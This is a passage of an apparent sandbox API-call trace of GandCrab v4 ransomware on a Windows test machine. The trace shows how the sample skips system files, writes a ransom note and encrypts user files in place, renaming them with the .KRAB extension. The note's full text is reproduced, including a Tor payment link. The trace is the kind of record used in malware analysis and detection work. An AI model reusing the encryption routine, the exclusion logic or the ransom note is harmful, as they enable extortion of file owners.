(lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.397] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.397] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0056.397] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0056.398] CloseHandle (hObject=0x454) returned 1 [0056.400] FindNextFileW (in: hFindFile=0xfbd760, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0056.400] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.400] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.400] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\KRAB-DECRYPT.txt" [0056.400] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.400] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\KRAB-DECRYPT.txt.KRAB") returned 76 [0056.400] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\KRAB-DECRYPT.txt") returned 71 [0056.400] lstrlenW (lpString=".txt") returned 4 [0056.400] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.400] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.400] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.401] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\KRAB-DECRYPT.txt") returned 71 [0056.401] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\KRAB-DECRYPT.txt") returned 71 [0056.401] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.401] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.401] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.401] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.401] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.401] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.401] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.401] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.401] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.401] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.401] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.401] FindNextFileW (in: hFindFile=0xfbd760, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0056.401] lstrcmpW (lpString1="Security", lpString2=".") returned 1 [0056.401] lstrcmpW (lpString1="Security", lpString2="..") returned 1 [0056.401] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2="Security" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security" [0056.401] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\" [0056.401] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0056.402] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0056.402] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0056.402] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0056.402] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0056.402] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.402] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.403] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\\\KRAB-DECRYPT.txt") returned 81 [0056.403] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0056.403] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0056.403] WriteFile (in: hFile=0x454, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0056.404] CloseHandle (hObject=0x454) returned 1 [0056.404] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.405] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.405] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x3, wMilliseconds=0x260)) [0056.405] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.405] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0056.405] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0056.406] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\d2ca4a08d2ca4dee3d.lock") returned 87 [0056.406] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x454 [0056.407] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.407] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.407] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\") returned 64 [0056.408] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\*" [0056.408] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbe0a0 [0056.408] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.408] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.408] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.408] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.408] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.408] lstrcmpW (lpString1="addressbook.acrodata", lpString2=".") returned 1 [0056.408] lstrcmpW (lpString1="addressbook.acrodata", lpString2="..") returned 1 [0056.408] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\", lpString2="addressbook.acrodata" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata" [0056.408] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.408] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata.KRAB") returned 89 [0056.408] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata") returned 84 [0056.408] lstrlenW (lpString=".acrodata") returned 9 [0056.408] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.409] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".acrodata ") returned 10 [0056.409] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.409] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata") returned 84 [0056.409] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata") returned 84 [0056.409] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="desktop.ini") returned -1 [0056.409] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="autorun.inf") returned -1 [0056.409] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="ntuser.dat") returned -1 [0056.409] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="iconcache.db") returned -1 [0056.409] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="bootsect.bak") returned -1 [0056.409] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="boot.ini") returned -1 [0056.409] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="ntuser.dat.log") returned -1 [0056.409] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="thumbs.db") returned -1 [0056.409] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="KRAB-DECRYPT.html") returned -1 [0056.409] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="KRAB-DECRYPT.txt") returned -1 [0056.410] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="CRAB-DECRYPT.txt") returned -1 [0056.410] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="ntldr") returned -1 [0056.410] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="NTDETECT.COM") returned -1 [0056.410] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="Bootfont.bin") returned -1 [0056.410] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.410] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0xfbca08) returned 1 [0056.410] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0056.411] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0056.411] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0056.411] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0056.411] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.411] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.411] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0xfbca08) returned 1 [0056.412] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0056.412] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0056.412] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0056.412] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0056.412] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.413] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.413] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0xfbca08) returned 1 [0056.413] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xfbd2e0) returned 1 [0056.413] CryptGetKeyParam (in: hKey=0xfbd2e0, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0056.413] CryptEncrypt (in: hKey=0xfbd2e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0056.414] GetLastError () returned 0x0 [0056.414] CryptDestroyKey (hKey=0xfbd2e0) returned 1 [0056.414] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.414] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0xfbca08) returned 1 [0056.414] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xfbd5e0) returned 1 [0056.414] CryptGetKeyParam (in: hKey=0xfbd5e0, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0056.414] CryptEncrypt (in: hKey=0xfbd5e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0056.415] GetLastError () returned 0x0 [0056.415] CryptDestroyKey (hKey=0xfbd5e0) returned 1 [0056.415] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.415] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\addressbook.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0056.439] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3600000 [0056.440] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0056.447] ReadFile (in: hFile=0x45c, lpBuffer=0x3600000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3600000*, lpNumberOfBytesRead=0x338e57c*=0x2a8f, lpOverlapped=0x0) returned 1 [0056.490] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0xffffd571, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.491] WriteFile (in: hFile=0x45c, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x2a8f, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e578*=0x2a8f, lpOverlapped=0x0) returned 1 [0056.491] WriteFile (in: hFile=0x45c, lpBuffer=0x35f0000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0056.491] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.495] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.495] CloseHandle (hObject=0x45c) returned 1 [0056.496] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.497] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\addressbook.acrodata"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\addressbook.acrodata.krab")) returned 1 [0056.497] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.498] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.498] lstrcmpW (lpString1="CRLCache", lpString2=".") returned 1 [0056.498] lstrcmpW (lpString1="CRLCache", lpString2="..") returned 1 [0056.498] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\", lpString2="CRLCache" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache" [0056.498] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\" [0056.498] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0056.498] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0056.498] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0056.498] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0056.498] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0056.499] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.499] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.499] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: 